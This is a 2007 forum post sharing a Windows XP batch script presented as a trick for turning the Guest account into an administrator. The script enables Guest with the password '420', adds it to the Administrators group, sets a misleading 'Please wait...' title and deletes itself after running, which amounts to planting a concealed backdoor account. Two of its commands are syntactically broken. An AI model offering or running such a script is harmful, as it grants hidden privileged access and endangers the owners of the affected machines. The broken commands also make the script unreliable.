View Single Post
Old 23-Feb-2007, 08:16 AM   #1 (permalink)
kingaff
Fixed Error!
 
kingaff's Avatar

Posts: 330
Join Date: Feb 2007
Rep Power: 2 kingaff is on a distinguished road

IM:
Default Convert Guest Account To Admin In Windows Xp, Nice Trick Options

Code:
echo off
title Please wait...
cls

net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add

del %0[/b]
Copy this to notepad and save the file as "Guest2admin.bat"
then u can dbl clk the file to execute or run in the cmd.
it works...
kingaff is offline   Reply With Quote